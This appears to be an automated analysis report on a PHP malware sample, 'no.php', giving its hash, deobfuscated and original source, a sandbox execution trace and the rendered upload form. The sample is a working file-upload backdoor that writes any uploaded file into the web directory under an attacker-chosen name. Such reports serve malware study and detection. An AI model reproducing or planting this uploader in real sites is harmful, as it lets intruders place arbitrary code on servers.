PHP Malware Analysis

no.php

md5: 546834244f4d8ca3fa041180643c5230

Deobfuscated PHP code

<?php

if (file_exists($_FILES["uploadfile"]["tmp_name"])) {
    $filename = $_FILES["uploadfile"]["tmp_name"];
    $fp = @fopen($filename, "r");
    $contents = @fread($fp, filesize($filename));
    @fclose($fp);
    $fp = fopen($_FILES["uploadfile"]["name"], "w");
    fputs($fp, $contents);
    fclose($fp);
    echo "file " . $_FILES["uploadfile"]["name"] . " Uploaded :) !";
}
?>
<FORM ENCTYPE="multipart/form-data" METHOD="POST">
</script><br>
<b>File:</b> <INPUT NAME="uploadfile" TYPE="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>

Execution traces

data/traces/546834244f4d8ca3fa041180643c5230_trace-1676241905.9102.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:45:31.808076]
1	0	1	0.000153	393464
1	3	0	0.000223	398152	{main}	1		/var/www/html/uploads/no.php	0	0
2	4	0	0.000255	398152	file_exists	0		/var/www/html/uploads/no.php	2	1	NULL
2	4	1	0.000270	398192
2	4	R			FALSE
1	3	1	0.000285	398152
			0.000320	314200
TRACE END   [2023-02-12 20:45:31.808273]


Generated HTML code

<html><head></head><body><form enctype="multipart/form-data" method="POST">
<br>
<b>File:</b> <input name="uploadfile" type="file">
<input type="submit" value="Send">
</form></body></html>

Original PHP code

<?php    
if( file_exists($_FILES["uploadfile"]["tmp_name"]) )
{
  $filename = $_FILES["uploadfile"]["tmp_name"];
  $fp=@fopen($filename,"r");
  $contents=@fread($fp, filesize($filename));
  @fclose($fp);
    
  $fp = fopen($_FILES["uploadfile"]["name"], "w");
  fputs($fp, $contents);
  fclose($fp);
  
  echo "file ". $_FILES["uploadfile"]["name"] ." Uploaded :) !";
}
?>
<FORM ENCTYPE="multipart/form-data" METHOD="POST">
</script><br>
<b>File:</b> <INPUT NAME="uploadfile" TYPE="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>